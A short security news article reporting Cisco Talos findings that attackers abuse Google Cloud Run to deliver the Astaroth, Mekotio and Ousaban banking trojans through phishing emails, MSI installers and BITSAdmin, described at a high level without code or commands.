Google Cloud Run, a service designed to streamline the deployment of both front and backend applications, is being abused by hackers to distribute banking trojans like Astaroth, Mekotio, and Ousaban, according to security experts.
Cisco Talos has reported a huge surge in the exploitation of Google Cloud Run for distributing harmful malware since September 2023. The service’s cost-efficiency and capability to bypass conventional security filters and blocks have made it an attractive target for attackers.
Volume of Google Cloud Run-related phishing emails (source: Cisco)
The attack begins with meticulously crafted phishing emails, masquerading as legitimate communications like invoices or official notifications from financial or governmental institutions. Predominantly crafted in Spanish to target the Latin American demographic, there have been instances of Italian-language emails, expanding the campaign’s reach.
Sample of phishing email (source: Cisco)
Victims are lured into clicking links within these emails, redirecting them to malevolent web services hosted on Google Cloud Run. In several instances, these links further redirect victims to download malicious ZIP archives containing MSI installer files from Google Cloud Storage, serving as the primary vehicle for malware delivery.
Upon execution, these MSI files trigger the download and activation of additional malicious components, exploiting legitimate Windows tools like BITSAdmin for stealthy payload delivery. To ensure their longevity within infected systems, the malware creates or modifies startup items that guarantee their reactivation post-reboot, thus solidifying their presence.
Here is a closer look at the trio of malware:
The exploitation of Google Cloud Run for the distribution of banking trojans represents a significant evolution in cybercriminal tactics, highlighting the need for continuous vigilance and advanced security measures to protect against these sophisticated threats.